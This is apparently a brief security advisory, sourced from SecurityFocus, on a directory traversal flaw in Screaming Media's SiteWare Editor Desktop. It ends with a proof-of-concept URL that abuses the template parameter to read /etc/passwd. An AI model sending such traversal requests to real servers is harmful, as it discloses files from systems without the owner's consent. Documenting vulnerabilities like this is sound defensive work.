7 lines
No EOL
581 B
Text
7 lines
No EOL
581 B
Text
source: http://www.securityfocus.com/bid/2868/info
|
|
|
|
Screaming Media is a provider for custom web content. SiteWare Editor Desktop is the web-based administration tool for managing Screaming Media content.
|
|
|
|
SiteWare Editor Desktop is prone to directory traversal attacks which can lead to disclosure of arbitrary webserver-readable files on the vulnerable host. This is due to the fact that the software does not filter '../' character sequences from HTTP Requests.
|
|
|
|
http://server:port/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/passwd |